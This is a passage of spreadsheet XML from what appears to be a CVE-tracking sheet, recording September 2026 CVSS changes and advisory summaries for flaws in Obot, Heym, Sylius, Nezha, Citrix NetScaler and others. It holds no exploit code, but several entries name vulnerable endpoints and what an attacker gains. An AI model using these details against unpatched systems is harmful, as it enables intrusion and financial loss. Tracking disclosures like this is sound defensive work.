      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Heym before 0.0.53 fails to verify the X-Telegram-Bot-Api-Secret-Token header on Telegram webhook endpoints when credential_id is absent or secret_token is empty. Remote unauthenticated attackers can post forged Telegram updates to trigger workflows with the owner's configured credentials and execute actions on attacker-supplied input.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101050</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.6 → 8.3)</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101064</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="M17" s="5" t="inlineStr">
        <is>
          <t>0.23.0</t>
        </is>
      </c>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>Obot before v0.23.0 contains a server-side request forgery vulnerability in remote MCP server registration that allows privileged users to specify arbitrary URLs without destination validation. Attackers with Power User or higher roles can coerce Obot to make requests to internal services and cloud metadata endpoints, reading responses in error messages to disclose sensitive credentials.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101064</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.9 → 8.2)</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100869</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>Sylius versions before 2.1.16 and 2.2.9 fail to restrict payment request actions in the Shop API endpoint, allowing customers to trigger refunds on completed orders. Attackers with order tokens can submit arbitrary payment actions like refunds that payment gateways execute while Sylius maintains order as paid, causing financial loss.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100869</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.5 → 7.7)</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100908</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Eyeplus 57.0.0.0308. This affects an unknown function of the component p2pcam HTTP Parser. Such manipulation leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100908</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 7.5)</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88778</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-342</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>Predictable exact value from previous values vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88778</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.0 → 7.3)</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101032</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>navi through 2.24.0 fails to properly escape cheatsheet variable values when substituting them into shell commands. Attackers can inject shell metacharacters through crafted file names in suggestion command directories to execute arbitrary commands with victim privileges.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101032</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.0 → 7.2)</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88774</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr"/>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading to a feature policy bypass due to improper HTTP URL based expression usage.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88774</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS vector changed</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101059</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">utcp-http </t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101059</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 7.1)</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101085</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>Nezha before 2.3.8 fails to validate alert rule type and duration bounds, allowing authenticated non-administrator users to create malformed rules that trigger unrecovered panics in the alert evaluator goroutine. Attackers can submit a crafted alert rule via the POST /api/v1/alert-rule endpoint to crash the dashboard process, which persists the rule and causes repeated crashes on restart, disabling all monitoring and control plane functionality.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101085</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 7.1)</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101086</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>Nezha Dashboard versions before 2.3.5 fail to restrict service monitor task types to supported probe types, allowing authenticated users with nezha:service:write scope to submit privileged task types through the service API. Attackers can deliver command execution or Agent configuration tasks to Agents within their authorization scope by exploiting the shared protobuf Task.Type namespace between service monitors and privileged operations.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101086</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 6.9)</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101056</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>Cloudreve before 4.16.1 fails to revalidate share access when restoring cached navigator state from a context_hint UUID. Attackers who previously had valid share access can replay the cached hint to generate signed file URLs for up to 300 seconds after the share is deleted, expires, or reaches zero remaining downloads.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101056</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 6.9)</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101063</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="M27" s="5" t="inlineStr">
        <is>
          <t>0.23.0</t>
        </is>
      </c>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>Obot versions before v0.23.0 fail to enforce authentication on MCP Registry endpoints under /v0.1/* when registry authentication is enabled. Unauthenticated attackers can read registry metadata including server names, descriptions, repository URLs, and connect URLs by sending GET requests to /v0.1/servers.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101063</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 5.7)</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100902</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-20</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Barco ClickShare CX-20 Gen2 up to 02.26.00.0007. Affected by this issue is some unknown functionality of the file /wallpaper of the component Wallpaper Upload. This manipulation of the argument wallpaper causes improper validation of syntactic correctness of input. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100902</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100874</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This affects an unknown function of the file addnewstudent.php. This manipulation causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100874</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100875</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This impacts an unknown function of the file updatedetailsfromfaculty.php. Such manipulation of the argument myfid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100875</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100889</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-193</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
